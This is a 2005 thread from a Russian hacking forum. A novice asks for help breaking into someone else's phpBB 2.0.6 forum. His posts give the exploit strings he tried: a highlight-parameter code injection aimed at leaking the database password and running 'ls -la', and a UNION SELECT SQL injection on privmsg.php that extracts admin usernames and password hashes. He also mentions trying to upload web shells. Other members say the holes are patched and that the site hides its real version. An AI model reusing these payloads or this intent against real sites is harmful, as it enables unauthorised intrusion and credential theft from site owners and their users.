Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Вопрос про Powered by phpBB 2.0.6 |

09.01.2005, 14:03
|
|
Новичок
Регистрация: 08.01.2005
Сообщений: 6
Провел на форуме: 0
Репутация:
0
|
|
Вопрос про Powered by phpBB 2.0.6
Есть такой вопрос:
Есть форум Powered by phpBB 2.0.6, если я пытаюсь его взломать через
http://адрес сайта/forum/viewtopic.php?p=44&highlight=%2527.$poster=$dbname .%2527
то оно не то что не показывает ничего, а просто отображает ник пользователя, тоесть ни спецсимволов ни тем более пароля нет.Помогите, как ещё можна вскрыть этот форум?
|
|
|

09.01.2005, 16:21
|
|
Новичок
Регистрация: 08.01.2005
Сообщений: 6
Провел на форуме: 0
Репутация:
0
|
|
Все описаные уязвимости перепробывал, реакции вообще нет(
плх, хелп
|
|
|

09.01.2005, 17:12
|
|
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме: 20377164
Репутация:
0
|
|
Мало инфы... Пиши то делал...
|
|
|

09.01.2005, 20:29
|
|
Новичок
Регистрация: 08.01.2005
Сообщений: 6
Провел на форуме: 0
Репутация:
0
|
|
Пробывал так:
privmsg.php?folder=savebox&mode=read&p=99& amp;pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0 ,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_level=1 LIMIT 1/*
При попытке закидывает на вход в систему
Пробывал так:
&highlight=%2527.$poster=$dbpasswd.%2527 ну естественно пробывал и пытался узнать $dbuser,$dbname,$dbname... при попытке открывается тема, но ник юзера так и остаётся, тоесть ни паса, ни логина, ни даже спецсимволов ничего нет....
p=123&highlight=%2527.$poster=%60ls%09-la%60.%2527
так тоже никакого рехультата, а значит и дамп базы я сделать тоже не могу...
ещё что-то пробывал, перерыл весь секьюрити лаб, пересмотрел все связаные с пхп видео на античате.... ничего не выходит...
|
|
|

09.01.2005, 20:30
|
|
Новичок
Регистрация: 08.01.2005
Сообщений: 6
Провел на форуме: 0
Репутация:
0
|
|
ну и шелы тоже заливать ну никак не получается... просто входит в тему и всё...
|
|
|

09.01.2005, 21:43
|
|
Участник форума
Регистрация: 03.01.2005
Сообщений: 270
Провел на форуме: 58594
Репутация:
6
|
|
|
|
|

09.01.2005, 22:21
|
|
Новичок
Регистрация: 08.01.2005
Сообщений: 6
Провел на форуме: 0
Репутация:
0
|
|
интересно, я дождусь ответа?
|
|
|

10.01.2005, 04:59
|
|
Новичок
Регистрация: 06.01.2005
Сообщений: 10
Провел на форуме: 3109
Репутация:
0
|
|
Esli u tebya nepoluchaetsa neodin exploit zdelat et znachet vse propatcheno, takshto zhdi noviee exploits
|
|
|

13.01.2005, 08:07
|
|
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме: 4226592
Репутация:
2175
|
|
Сообщение от Lancelot
интересно, я дождусь ответа?
Хехе, не форум на chat.vi******* ты роешь? здается мне, 4то да  он меня тоже достал(а 4ат их и вовсе для интеллектуалов), в4ера пол но4и за ним сидел. Так вот: он на самом деле 2.0.11, а его админы, не будь последними нуБаМи, надпись на 2.0.6 поменяли. Странно да, лу4ше бы так и оставили, ато киддисы досмерти зат*ахают...
|
|
|

13.01.2005, 08:10
|
|
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме: 4226592
Репутация:
2175
|
|
Сообщение от frisco_virus
Да как ты его зальеш-то туда, там ведь ни одного топика нет!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|